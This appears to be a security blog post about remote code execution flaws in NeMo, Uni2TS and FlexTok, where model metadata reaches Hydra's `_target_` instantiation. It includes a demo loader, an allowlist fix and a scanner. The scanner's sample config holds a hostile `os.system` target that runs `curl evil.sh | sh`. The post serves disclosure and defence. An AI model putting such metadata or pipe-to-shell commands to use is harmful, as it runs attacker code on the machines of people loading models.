Critical Remote Code Execution Vulnerabilities in AI/ML Libraries: NeMo, Uni2TS, FlexTok (2026)

AI Libraries Under Fire: Uncovering Remote Code Execution Vulnerabilities

Imagine a world where loading a seemingly harmless AI model grants attackers full control over your system. It sounds like a sci-fi nightmare, but it isn't fiction: we've discovered critical vulnerabilities in popular AI/ML libraries from tech giants like Apple, Salesforce, and NVIDIA that allow remote code execution (RCE) through malicious model metadata.

The Culprits: Popular Libraries with a Dark Secret

These vulnerabilities lurk within three widely-used open-source Python libraries:

  • NeMo (NVIDIA): A powerful framework for building diverse AI models, boasting over 700 models on HuggingFace, including the popular Parakeet.
  • Uni2TS (Salesforce): The library powering Salesforce's Moirai, a time series forecasting model with hundreds of thousands of downloads.
  • FlexTok (Apple & EPFL VILAB): A framework enabling image processing in AI models, primarily used by EPFL VILAB's models.

The Vulnerability: Metadata Becomes a Weapon

The issue stems from how these libraries handle model metadata. Each uses Hydra, a third-party configuration framework, to instantiate classes described in that metadata. Vulnerable versions pass attacker-controlled metadata straight to Hydra's instantiation machinery, which resolves a `_target_` field to an arbitrary Python callable and invokes it. An attacker can therefore embed a malicious target in the metadata; when a compromised model is loaded, the attacker's code executes, granting them control.
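To make the pattern concrete, here is a minimal, self-contained sketch of `_target_`-style instantiation. This is a simplified stand-in, not Hydra's actual implementation: the metadata names a dotted import path, and the loader imports and calls it with the remaining keys as keyword arguments.

```python
import importlib

def naive_instantiate(config: dict):
    """Simplified stand-in for Hydra-style instantiation (not Hydra's
    real code): resolve the dotted path in `_target_` to a Python
    callable, then invoke it with the remaining keys as kwargs."""
    module_path, _, attr = config["_target_"].rpartition(".")
    target = getattr(importlib.import_module(module_path), attr)
    kwargs = {k: v for k, v in config.items() if k != "_target_"}
    return target(**kwargs)

# Benign metadata: instantiates an ordinary object.
delta = naive_instantiate({"_target_": "datetime.timedelta", "days": 2})
print(delta.days)  # 2

# The same mechanism runs *any* importable callable, so metadata like
#   {"_target_": "os.system", ...}
# in a malicious model config would execute an attacker-chosen command.
```

The danger is that the callable is chosen by whoever wrote the metadata, not by the code that loads it.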

Here is the part most people miss: newer model formats such as safetensors were designed to make model weights safe to load, yet these libraries reintroduce the risk through their handling of metadata and configuration data.

The Fix: Patches and Awareness

The good news? All affected vendors have been notified and have released patches:

  • NVIDIA: Released a fix in NeMo 2.3.2 (CVE-2025-23304).
  • Salesforce: Deployed a fix on July 31, 2025 (CVE-2026-22584).
  • Apple & EPFL VILAB: Updated ml-flextok with YAML parsing and an allowlist for safer instantiation.
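An allowlist mitigation like the one described for ml-flextok can be sketched as follows. This is an illustrative example, not the project's actual code, and the allowlisted targets are placeholders: before instantiating, the loader rejects any `_target_` that is not on a short list of expected classes.

```python
import importlib

# Hypothetical allowlist: only the targets this application expects.
ALLOWED_TARGETS = {
    "datetime.timedelta",
    "fractions.Fraction",
}

def safe_instantiate(config: dict):
    """Instantiate only if `_target_` is explicitly allowlisted."""
    target_path = config["_target_"]
    if target_path not in ALLOWED_TARGETS:
        raise ValueError(f"refusing to instantiate untrusted target: {target_path}")
    module_path, _, attr = target_path.rpartition(".")
    target = getattr(importlib.import_module(module_path), attr)
    kwargs = {k: v for k, v in config.items() if k != "_target_"}
    return target(**kwargs)

# An allowed target works; anything else (e.g. "os.system") is rejected.
print(safe_instantiate({"_target_": "datetime.timedelta", "days": 1}))
```

The key design choice is deny-by-default: the loader enumerates what it trusts rather than trying to enumerate what is dangerous.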

The Bigger Picture: A Call for Vigilance

While no malicious exploits have been detected yet, the potential for harm is real. Attackers could easily modify popular models, adding malicious metadata and distributing them as seemingly legitimate updates. This highlights the need for:

  • Strict model vetting: Only load models from trusted sources.
  • Robust security practices: Implement code reviews and vulnerability scanning for AI/ML pipelines.
  • Continued research: The AI security landscape is constantly evolving, requiring ongoing vigilance.
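As one building block for that kind of pipeline scanning, a tool could walk each model's configuration and flag `_target_` entries it does not recognize before anything is instantiated. A minimal sketch follows; the allowlist, the config shape, and names like `my_pkg.MyModel` are assumptions for illustration only.

```python
def find_untrusted_targets(node, allowed, path="config"):
    """Recursively collect (path, target) pairs for every `_target_`
    value in a nested config that is not on the allowlist."""
    hits = []
    if isinstance(node, dict):
        target = node.get("_target_")
        if isinstance(target, str) and target not in allowed:
            hits.append((path, target))
        for key, value in node.items():
            hits.extend(find_untrusted_targets(value, allowed, f"{path}.{key}"))
    elif isinstance(node, list):
        for i, value in enumerate(node):
            hits.extend(find_untrusted_targets(value, allowed, f"{path}[{i}]"))
    return hits

# Example: a nested model config hiding a dangerous target.
config = {
    "model": {"_target_": "my_pkg.MyModel", "layers": 12},
    "callbacks": [{"_target_": "os.system", "command": "curl evil.sh | sh"}],
}
print(find_untrusted_targets(config, allowed={"my_pkg.MyModel"}))
# → [('config.callbacks[0]', 'os.system')]
```

Running such a check in CI, before any model config reaches an instantiation call, turns "only load trusted models" from a policy into an enforced gate.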

A Thought-Provoking Question: As AI becomes increasingly integrated into our lives, how can we ensure the security and trustworthiness of these powerful tools? Should there be stricter regulations or industry standards for AI model development and deployment? Let's spark a conversation in the comments below!

Author: Madonna Wisozk